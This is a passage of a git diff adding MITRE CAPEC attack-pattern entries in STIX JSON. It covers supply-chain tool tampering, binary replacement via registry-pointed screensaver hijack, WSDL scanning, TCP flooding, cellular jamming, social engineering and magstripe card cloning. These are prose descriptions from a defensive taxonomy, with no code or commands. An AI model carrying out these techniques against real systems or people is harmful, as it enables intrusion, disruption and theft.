Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json new file mode 100644 index 0000000000000000000000000000000000000000..c942c35c4028d88495b7b3eab39a245963f15d9b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json 
@@ -0,0 +1,60 @@ +{ + "id": "bundle--812515ca-85bd-4794-a2fc-8d817cb56bc4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.", + "external_references": [ + { + "external_id": "CAPEC-166", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/166.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-1221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1221.html" + }, + { + "external_id": "CWE-1232", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1232.html" + } + ], + "id": "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Force the System to Reset Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. 
The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.\n ", + "x_capec_prerequisites": [ + "The targeted application must have a reset function that returns the configuration of the application to an earlier state.", + "The reset functionality must be inadequately protected against use." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json new file mode 100644 index 0000000000000000000000000000000000000000..8ff7def5308849372a44f512f6a1fdc8fe6274ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json 
@@ -0,0 +1,48 @@ +{ + "id": "bundle--63a226ef-c1b6-4e5c-859d-9cf67a141275", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. 
If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json new file mode 100644 index 0000000000000000000000000000000000000000..3bbd7707f6485445c2f5f9392da44fda6d593094 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json 
@@ -0,0 +1,71 @@ +{ + "id": "bundle--65b89dec-062b-44d5-b9c4-4edd3f855d57", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json new file mode 100644 index 0000000000000000000000000000000000000000..300a0569101823d31f604d236e665607b6bf9b87 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json 
@@ -0,0 +1,72 @@ +{ + "id": "bundle--4e7f1b5c-1c92-42d6-a300-7d3ae232fb7b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. 
A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json new file mode 100644 index 0000000000000000000000000000000000000000..be8d3f6e4650ea774eccad34a41d1a593a8d7858 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json 
@@ -0,0 +1,62 @@ +{ + "id": "bundle--fb632286-bed0-4a74-ae90-e9ec86832c47", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to 
send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json new file mode 100644 index 0000000000000000000000000000000000000000..c27005dc6048544ea8f5e9480b656f6d5a05f9ef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json 
@@ -0,0 +1,47 @@ +{ + "id": "bundle--c6fa0b00-c35f-47b3-a7b9-75c24df549fc", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json new file mode 100644 index 0000000000000000000000000000000000000000..79d3ea16cbcecae5d62ab3669b5fed0f4b730e59 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json 
@@ -0,0 +1,43 @@ +{ + "id": "bundle--cffc0bf8-c0a4-4cd1-b9ee-11105a7ae7a3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere.", + "external_references": [ + { + "external_id": "CAPEC-179", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/179.html" + } + ], + "id": "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Calling Micro-Services Directly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. 
It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.\n ", + "x_capec_prerequisites": [ + "The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern." + ], + "x_capec_resources_required": [ + "The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json new file mode 100644 index 0000000000000000000000000000000000000000..7c763c2d32cb1cf015360dc1459ea764465cb5b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json 
@@ -0,0 +1,41 @@ +{ + "id": "bundle--63b6d632-c794-42a7-b46d-dc5a75e7b1ab", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-277", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/277.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + } + ], + "id": "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Data Interchange Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json new file mode 100644 index 0000000000000000000000000000000000000000..2dc9fbb5a3ea06bef69a810b2a5d62c33b4680d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json 
@@ -0,0 +1,71 @@ +{ + "id": "bundle--da5864f2-64ef-4516-8182-bade6fe9bc30", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and 
negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json new file mode 100644 index 0000000000000000000000000000000000000000..3d9fc3f2176d3eb1de43b42751aaef54d2b90528 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json 
@@ -0,0 +1,40 @@ +{ + "id": "bundle--ac696d25-0337-4b91-a30b-acf7e8052120", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. 
